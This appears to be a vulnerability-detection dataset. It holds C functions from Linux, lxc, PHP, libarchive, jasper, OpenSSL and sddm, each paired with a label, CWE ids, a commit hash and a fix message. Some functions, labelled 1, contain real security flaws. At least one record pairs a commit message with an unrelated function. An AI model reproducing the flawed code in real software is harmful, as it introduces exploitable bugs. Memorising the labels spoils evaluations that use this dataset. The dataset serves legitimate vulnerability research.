KVM: SEV: add cache flush to solve SEV cache incoherency issues Flush the CPU caches when memory is reclaimed from an SEV guest (where reclaim also includes it being unmapped from KVM's memslots). Due to lack of coherency for SEV encrypted memory, failure to flush results in silent data corruption if userspace is malicious/broken and doesn't ensure SEV guest memory is properly pinned and unpinned. Cache coherency is not enforced across the VM boundary in SEV (AMD APM vol.2 Section 15.34.7). Confidential cachelines, generated by confidential VM guests have to be explicitly flushed on the host side. If a memory page containing dirty confidential cachelines was released by VM and reallocated to another user, the cachelines may corrupt the new user at a later time. KVM takes a shortcut by assuming all confidential memory remain pinned until the end of VM lifetime. Therefore, KVM does not flush cache at mmu_notifier invalidation events. Because of this incorrect assumption and the lack of cache flushing, malicous userspace can crash the host kernel: creating a malicious VM and continuously allocates/releases unpinned confidential memory pages when the VM is running. Add cache flush operations to mmu_notifier operations to ensure that any physical memory leaving the guest VM get flushed. In particular, hook mmu_notifier_invalidate_range_start and mmu_notifier_release events and flush cache accordingly. The hook after releasing the mmu lock to avoid contention with other vCPUs. Cc: [email protected] Suggested-by: Sean Christpherson <[email protected]> Reported-by: Mingwei Zhang <[email protected]> Signed-off-by: Mingwei Zhang <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static int ath6kl_usb_power_on(struct ath6kl *ar) { hif_start(ar); return 0; }
0
[ "CWE-476" ]
linux
39d170b3cb62ba98567f5c4f40c27b5864b304e5
130,573,669,732,034,500,000,000,000,000,000,000,000
5
ath6kl: fix a NULL-ptr-deref bug in ath6kl_usb_alloc_urb_from_pipe() The `ar_usb` field of `ath6kl_usb_pipe_usb_pipe` objects are initialized to point to the containing `ath6kl_usb` object according to endpoint descriptors read from the device side, as shown below in `ath6kl_usb_setup_pipe_resources`: for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) { endpoint = &iface_desc->endpoint[i].desc; // get the address from endpoint descriptor pipe_num = ath6kl_usb_get_logical_pipe_num(ar_usb, endpoint->bEndpointAddress, &urbcount); ...... // select the pipe object pipe = &ar_usb->pipes[pipe_num]; // initialize the ar_usb field pipe->ar_usb = ar_usb; } The driver assumes that the addresses reported in endpoint descriptors from device side to be complete. If a device is malicious and does not report complete addresses, it may trigger NULL-ptr-deref `ath6kl_usb_alloc_urb_from_pipe` and `ath6kl_usb_free_urb_to_pipe`. This patch fixes the bug by preventing potential NULL-ptr-deref (CVE-2019-15098). Signed-off-by: Hui Peng <[email protected]> Reported-by: Hui Peng <[email protected]> Reported-by: Mathias Payer <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
static bool cull_entries(int fd, char *me, char *t, char *br) { struct stat sb; char *buf, *p, *e, *nic; off_t len; struct entry_line *entry_lines = NULL; int i, n = 0; nic = alloca(100); if (fstat(fd, &sb) < 0) { fprintf(stderr, "Failed to fstat: %s\n", strerror(errno)); return false; } len = sb.st_size; if (len == 0) return true; buf = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (buf == MAP_FAILED) { fprintf(stderr, "Failed to create mapping: %s\n", strerror(errno)); return false; } p = buf; e = buf + len; while ((p = find_line(p, e, me, t, br)) != NULL) { struct entry_line *newe = realloc(entry_lines, sizeof(*entry_lines)*(n+1)); if (!newe) { free(entry_lines); return false; } entry_lines = newe; entry_lines[n].start = p; entry_lines[n].len = get_eol(p, e) - entry_lines[n].start; entry_lines[n].keep = true; n++; if (!get_nic_from_line(p, &nic)) continue; if (nic && !nic_exists(nic)) entry_lines[n-1].keep = false; p += entry_lines[n-1].len + 1; if (p >= e) break; } p = buf; for (i=0; i<n; i++) { if (!entry_lines[i].keep) continue; memcpy(p, entry_lines[i].start, entry_lines[i].len); p += entry_lines[i].len; *p = '\n'; p++; } free(entry_lines); munmap(buf, sb.st_size); if (ftruncate(fd, p-buf)) fprintf(stderr, "Failed to set new file size\n"); return true; }
0
[ "CWE-284", "CWE-862" ]
lxc
16af238036a5464ae8f2420ed3af214f0de875f9
143,931,741,631,942,970,000,000,000,000,000,000,000
59
CVE-2017-5985: Ensure target netns is caller-owned Before this commit, lxc-user-nic could potentially have been tricked into operating on a network namespace over which the caller did not hold privilege. This commit ensures that the caller is privileged over the network namespace by temporarily dropping privilege. Launchpad: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1654676 Reported-by: Jann Horn <[email protected]> Signed-off-by: Christian Brauner <[email protected]>
static void adu_release_internal(struct adu_device *dev) { /* decrement our usage count for the device */ --dev->open_count; dev_dbg(&dev->udev->dev, "%s : open count %d\n", __func__, dev->open_count); if (dev->open_count <= 0) { adu_abort_transfers(dev); dev->open_count = 0; } }
0
[ "CWE-416" ]
linux
44efc269db7929f6275a1fa927ef082e533ecde0
262,098,219,007,398,360,000,000,000,000,000,000,000
11
USB: adutux: fix use-after-free on disconnect The driver was clearing its struct usb_device pointer, which it used as an inverted disconnected flag, before deregistering the character device and without serialising against racing release(). This could lead to a use-after-free if a racing release() callback observes the cleared pointer and frees the driver data before disconnect() is finished with it. This could also lead to NULL-pointer dereferences in a racing open(). Fixes: f08812d5eb8f ("USB: FIx locks and urb->status in adutux (updated)") Cc: stable <[email protected]> # 2.6.24 Reported-by: [email protected] Tested-by: [email protected] Signed-off-by: Johan Hovold <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
static inline int object_common2(UNSERIALIZE_PARAMETER, long elements) { zval *retval_ptr = NULL; zval fname; if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_PP(rval), elements)) { return 0; } if (Z_OBJCE_PP(rval) != PHP_IC_ENTRY && zend_hash_exists(&Z_OBJCE_PP(rval)->function_table, "__wakeup", sizeof("__wakeup"))) { INIT_PZVAL(&fname); ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1, 0); call_user_function_ex(CG(function_table), rval, &fname, &retval_ptr, 0, 0, 1, NULL TSRMLS_CC); } if (retval_ptr) zval_ptr_dtor(&retval_ptr); return finish_nested_data(UNSERIALIZE_PASSTHRU); }
1
[]
php-src
d3fdacb99fab186654bdf2f3adb17d9c628202f0
189,616,282,498,630,130,000,000,000,000,000,000,000
22
- Fixed #55798: serialize followed by unserialize with numeric object prop. gives integer prop.
archive_acl_next(struct archive *a, struct archive_acl *acl, int want_type, int *type, int *permset, int *tag, int *id, const char **name) { *name = NULL; *id = -1; /* * The acl_state is either zero (no entries available), -1 * (reading from list), or an entry type (retrieve that type * from ae_stat.aest_mode). */ if (acl->acl_state == 0) return (ARCHIVE_WARN); /* The first three access entries are special. */ if ((want_type & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) { switch (acl->acl_state) { case ARCHIVE_ENTRY_ACL_USER_OBJ: *permset = (acl->mode >> 6) & 7; *type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS; *tag = ARCHIVE_ENTRY_ACL_USER_OBJ; acl->acl_state = ARCHIVE_ENTRY_ACL_GROUP_OBJ; return (ARCHIVE_OK); case ARCHIVE_ENTRY_ACL_GROUP_OBJ: *permset = (acl->mode >> 3) & 7; *type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS; *tag = ARCHIVE_ENTRY_ACL_GROUP_OBJ; acl->acl_state = ARCHIVE_ENTRY_ACL_OTHER; return (ARCHIVE_OK); case ARCHIVE_ENTRY_ACL_OTHER: *permset = acl->mode & 7; *type = ARCHIVE_ENTRY_ACL_TYPE_ACCESS; *tag = ARCHIVE_ENTRY_ACL_OTHER; acl->acl_state = -1; acl->acl_p = acl->acl_head; return (ARCHIVE_OK); default: break; } } while (acl->acl_p != NULL && (acl->acl_p->type & want_type) == 0) acl->acl_p = acl->acl_p->next; if (acl->acl_p == NULL) { acl->acl_state = 0; *type = 0; *permset = 0; *tag = 0; *id = -1; *name = NULL; return (ARCHIVE_EOF); /* End of ACL entries. */ } *type = acl->acl_p->type; *permset = acl->acl_p->permset; *tag = acl->acl_p->tag; *id = acl->acl_p->id; if (archive_mstring_get_mbs(a, &acl->acl_p->name, name) != 0) { if (errno == ENOMEM) return (ARCHIVE_FATAL); *name = NULL; } acl->acl_p = acl->acl_p->next; return (ARCHIVE_OK); }
0
[ "CWE-476" ]
libarchive
15bf44fd2c1ad0e3fd87048b3fcc90c4dcff1175
157,346,678,687,934,190,000,000,000,000,000,000,000
64
Skip 0-length ACL fields Currently, it is possible to create an archive that crashes bsdtar with a malformed ACL: Program received signal SIGSEGV, Segmentation fault. archive_acl_from_text_l (acl=<optimised out>, text=0x7e2e92 "", want_type=<optimised out>, sc=<optimised out>) at libarchive/archive_acl.c:1726 1726 switch (*s) { (gdb) p n $1 = 1 (gdb) p field[n] $2 = {start = 0x0, end = 0x0} Stop this by checking that the length is not zero before beginning the switch statement. I am pretty sure this is the bug mentioned in the qsym paper [1], and I was able to replicate it with a qsym + AFL + afl-rb setup. [1] https://www.usenix.org/conference/usenixsecurity18/presentation/yun
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile) { int i; int j; jpc_dec_tcomp_t *tcomp; jpc_dec_rlvl_t *rlvl; jpc_dec_band_t *band; int compno; int rlvlno; int bandno; int adjust; int v; jpc_dec_ccp_t *ccp; jpc_dec_cmpt_t *cmpt; if (jpc_dec_decodecblks(dec, tile)) { jas_eprintf("jpc_dec_decodecblks failed\n"); return -1; } /* Perform dequantization. */ for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps; ++compno, ++tcomp) { ccp = &tile->cp->ccps[compno]; for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls; ++rlvlno, ++rlvl) { if (!rlvl->bands) { continue; } for (bandno = 0, band = rlvl->bands; bandno < rlvl->numbands; ++bandno, ++band) { if (!band->data) { continue; } jpc_undo_roi(band->data, band->roishift, ccp->roishift - band->roishift, band->numbps); if (tile->realmode) { jas_matrix_asl(band->data, JPC_FIX_FRACBITS); jpc_dequantize(band->data, band->absstepsize); } } } } /* Apply an inverse wavelet transform if necessary. */ for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps; ++compno, ++tcomp) { ccp = &tile->cp->ccps[compno]; jpc_tsfb_synthesize(tcomp->tsfb, tcomp->data); } /* Apply an inverse intercomponent transform if necessary. */ switch (tile->cp->mctid) { case JPC_MCT_RCT: assert(dec->numcomps == 3); jpc_irct(tile->tcomps[0].data, tile->tcomps[1].data, tile->tcomps[2].data); break; case JPC_MCT_ICT: assert(dec->numcomps == 3); jpc_iict(tile->tcomps[0].data, tile->tcomps[1].data, tile->tcomps[2].data); break; } /* Perform rounding and convert to integer values. */ if (tile->realmode) { for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps; ++compno, ++tcomp) { for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) { for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) { v = jas_matrix_get(tcomp->data, i, j); v = jpc_fix_round(v); jas_matrix_set(tcomp->data, i, j, jpc_fixtoint(v)); } } } } /* Perform level shift. */ for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno < dec->numcomps; ++compno, ++tcomp, ++cmpt) { adjust = cmpt->sgnd ? 0 : (1 << (cmpt->prec - 1)); for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) { for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) { *jas_matrix_getref(tcomp->data, i, j) += adjust; } } } /* Perform clipping. */ for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno < dec->numcomps; ++compno, ++tcomp, ++cmpt) { jpc_fix_t mn; jpc_fix_t mx; mn = cmpt->sgnd ? (-(1 << (cmpt->prec - 1))) : (0); mx = cmpt->sgnd ? ((1 << (cmpt->prec - 1)) - 1) : ((1 << cmpt->prec) - 1); jas_matrix_clip(tcomp->data, mn, mx); } /* XXX need to free tsfb struct */ /* Write the data for each component of the image. */ for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno < dec->numcomps; ++compno, ++tcomp, ++cmpt) { if (jas_image_writecmpt(dec->image, compno, tcomp->xstart - JPC_CEILDIV(dec->xstart, cmpt->hstep), tcomp->ystart - JPC_CEILDIV(dec->ystart, cmpt->vstep), jas_matrix_numcols( tcomp->data), jas_matrix_numrows(tcomp->data), tcomp->data)) { jas_eprintf("write component failed\n"); return -4; } } return 0; }
0
[ "CWE-189" ]
jasper
5dbe57e4808bea4b83a97e2f4aaf8c91ab6fdecb
321,893,140,666,814,660,000,000,000,000,000,000,000
119
CVE-2014-9029
return err; } static int iscsi_logout_flashnode(struct iscsi_transport *transport, struct iscsi_uevent *ev) { struct Scsi_Host *shost; struct iscsi_bus_flash_session *fnode_sess; struct iscsi_bus_flash_conn *fnode_conn; struct device *dev; uint32_t idx; int err = 0; if (!transport->logout_flashnode) { err = -ENOSYS; goto exit_logout_fnode; } shost = scsi_host_lookup(ev->u.logout_flashnode.host_no); if (!shost) { pr_err("%s could not find host no %u\n", __func__, ev->u.logout_flashnode.host_no); err = -ENODEV; goto put_host; } idx = ev->u.logout_flashnode.flashnode_idx; fnode_sess = iscsi_get_flashnode_by_index(shost, idx); if (!fnode_sess) { pr_err("%s could not find flashnode %u for host no %u\n", __func__, idx, ev->u.logout_flashnode.host_no); err = -ENODEV; goto put_host; } dev = iscsi_find_flashnode_conn(fnode_sess); if (!dev) { err = -ENODEV; goto put_sess; } fnode_conn = iscsi_dev_to_flash_conn(dev); err = transport->logout_flashnode(fnode_sess, fnode_conn); put_device(dev); put_sess: put_device(&fnode_sess->dev); put_host: scsi_host_put(shost);
0
[ "CWE-787" ]
linux
ec98ea7070e94cc25a422ec97d1421e28d97b7ee
162,779,946,136,049,800,000,000,000,000,000,000,000
52
scsi: iscsi: Ensure sysfs attributes are limited to PAGE_SIZE As the iSCSI parameters are exported back through sysfs, it should be enforcing that they never are more than PAGE_SIZE (which should be more than enough) before accepting updates through netlink. Change all iSCSI sysfs attributes to use sysfs_emit(). Cc: [email protected] Reported-by: Adam Nichols <[email protected]> Reviewed-by: Lee Duncan <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Reviewed-by: Mike Christie <[email protected]> Signed-off-by: Chris Leech <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
bool PamBackend::closeSession() { if (m_pam->isOpen()) { qDebug() << "[PAM] Closing session"; m_pam->closeSession(); m_pam->setCred(PAM_DELETE_CRED); return true; } qWarning() << "[PAM] Asked to close the session but it wasn't previously open"; return Backend::closeSession(); }
0
[ "CWE-613", "CWE-287", "CWE-284" ]
sddm
147cec383892d143b5e02daa70f1e7def50f5d98
280,000,254,220,522,240,000,000,000,000,000,000,000
10
Fix authentication when reusing an existing session - Check the success value before unlocking the session - Don't attempt to use the nonexistant "sddm-check" PAM service
int tls1_set_sigalgs(CERT *c, const int *salg, size_t salglen) { TLS_SIGALGS *sigalgs, *sptr; int rhash, rsign; size_t i; if (salglen & 1) return 0; salglen /= 2; sigalgs = OPENSSL_malloc(sizeof(TLS_SIGALGS) * salglen); if (sigalgs == NULL) return 0; for (i = 0, sptr = sigalgs; i < salglen; i++, sptr++) { sptr->hash_nid = *salg++; sptr->sign_nid = *salg++; rhash = tls12_find_id(sptr->hash_nid, tls12_md, sizeof(tls12_md)/sizeof(tls12_lookup)); rsign = tls12_find_id(sptr->sign_nid, tls12_sig, sizeof(tls12_sig)/sizeof(tls12_lookup)); if (rhash == -1 || rsign == -1) goto err; if (!OBJ_find_sigid_by_algs(&sptr->signandhash_nid, sptr->hash_nid, sptr->sign_nid)) sptr->signandhash_nid = NID_undef; sptr->rhash = rhash; sptr->rsign = rsign; } if (c->conf_sigalgs) OPENSSL_free(c->conf_sigalgs); c->conf_sigalgs = sigalgs; c->conf_sigalgslen = salglen; return 1; err: OPENSSL_free(sigalgs); return 0; }
1
[]
openssl
c70a1fee71119a9005b1f304a3bf47694b4a53ac
4,146,853,087,409,819,000,000,000,000,000,000,000
42
Reorganise supported signature algorithm extension processing. Only store encoded versions of peer and configured signature algorithms. Determine shared signature algorithms and cache the result along with NID equivalents of each algorithm. (backport from HEAD)
int device_match_any(struct device *dev, const void *unused) { return 1; }
0
[ "CWE-787" ]
linux
aa838896d87af561a33ecefea1caa4c15a68bc47
318,366,075,033,947,320,000,000,000,000,000,000,000
4
drivers core: Use sysfs_emit and sysfs_emit_at for show(device *...) functions Convert the various sprintf fmaily calls in sysfs device show functions to sysfs_emit and sysfs_emit_at for PAGE_SIZE buffer safety. Done with: $ spatch -sp-file sysfs_emit_dev.cocci --in-place --max-width=80 . And cocci script: $ cat sysfs_emit_dev.cocci @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - sprintf(buf, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - snprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - scnprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> } @@ identifier d_show; identifier dev, attr, buf; expression chr; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... return - strcpy(buf, chr); + sysfs_emit(buf, chr); ...> } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - sprintf(buf, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - snprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... len = - scnprintf(buf, PAGE_SIZE, + sysfs_emit(buf, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; identifier len; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { <... - len += scnprintf(buf + len, PAGE_SIZE - len, + len += sysfs_emit_at(buf, len, ...); ...> return len; } @@ identifier d_show; identifier dev, attr, buf; expression chr; @@ ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf) { ... - strcpy(buf, chr); - return strlen(buf); + return sysfs_emit(buf, chr); } Signed-off-by: Joe Perches <[email protected]> Link: https://lore.kernel.org/r/3d033c33056d88bbe34d4ddb62afd05ee166ab9a.1600285923.git.joe@perches.com Signed-off-by: Greg Kroah-Hartman <[email protected]>
static bool fm10k_alloc_mapped_page(struct fm10k_ring *rx_ring, struct fm10k_rx_buffer *bi) { struct page *page = bi->page; dma_addr_t dma; /* Only page will be NULL if buffer was consumed */ if (likely(page)) return true; /* alloc new page for storage */ page = dev_alloc_page(); if (unlikely(!page)) { rx_ring->rx_stats.alloc_failed++; return false; } /* map page for use */ dma = dma_map_page(rx_ring->dev, page, 0, PAGE_SIZE, DMA_FROM_DEVICE); /* if mapping failed free memory back to system since * there isn't much point in holding memory we can't use */ if (dma_mapping_error(rx_ring->dev, dma)) { __free_page(page); rx_ring->rx_stats.alloc_failed++; return false; } bi->dma = dma; bi->page = page; bi->page_offset = 0; return true; }
0
[ "CWE-476" ]
linux
01ca667133d019edc9f0a1f70a272447c84ec41f
296,239,010,784,542,900,000,000,000,000,000,000,000
36
fm10k: Fix a potential NULL pointer dereference Syzkaller report this: kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN PTI CPU: 0 PID: 4378 Comm: syz-executor.0 Tainted: G C 5.0.0+ #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014 RIP: 0010:__lock_acquire+0x95b/0x3200 kernel/locking/lockdep.c:3573 Code: 00 0f 85 28 1e 00 00 48 81 c4 08 01 00 00 5b 5d 41 5c 41 5d 41 5e 41 5f c3 4c 89 ea 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 <80> 3c 02 00 0f 85 cc 24 00 00 49 81 7d 00 e0 de 03 a6 41 bc 00 00 RSP: 0018:ffff8881e3c07a40 EFLAGS: 00010002 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000080 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000 R10: ffff8881e3c07d98 R11: ffff8881c7f21f80 R12: 0000000000000001 R13: 0000000000000080 R14: 0000000000000000 R15: 0000000000000001 FS: 00007fce2252e700(0000) GS:ffff8881f2400000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fffc7eb0228 CR3: 00000001e5bea002 CR4: 00000000007606f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: lock_acquire+0xff/0x2c0 kernel/locking/lockdep.c:4211 __mutex_lock_common kernel/locking/mutex.c:925 [inline] __mutex_lock+0xdf/0x1050 kernel/locking/mutex.c:1072 drain_workqueue+0x24/0x3f0 kernel/workqueue.c:2934 destroy_workqueue+0x23/0x630 kernel/workqueue.c:4319 __do_sys_delete_module kernel/module.c:1018 [inline] __se_sys_delete_module kernel/module.c:961 [inline] __x64_sys_delete_module+0x30c/0x480 kernel/module.c:961 do_syscall_64+0x9f/0x450 arch/x86/entry/common.c:290 entry_SYSCALL_64_after_hwframe+0x49/0xbe RIP: 0033:0x462e99 Code: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fce2252dc58 EFLAGS: 00000246 ORIG_RAX: 00000000000000b0 RAX: ffffffffffffffda RBX: 000000000073bf00 RCX: 0000000000462e99 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000020000140 RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 00007fce2252e6bc R13: 00000000004bcca9 R14: 00000000006f6b48 R15: 00000000ffffffff If alloc_workqueue fails, it should return -ENOMEM, otherwise may trigger this NULL pointer dereference while unloading drivers. Reported-by: Hulk Robot <[email protected]> Fixes: 0a38c17a21a0 ("fm10k: Remove create_workqueue") Signed-off-by: Yue Haibing <[email protected]> Tested-by: Andrew Bowers <[email protected]> Signed-off-by: Jeff Kirsher <[email protected]>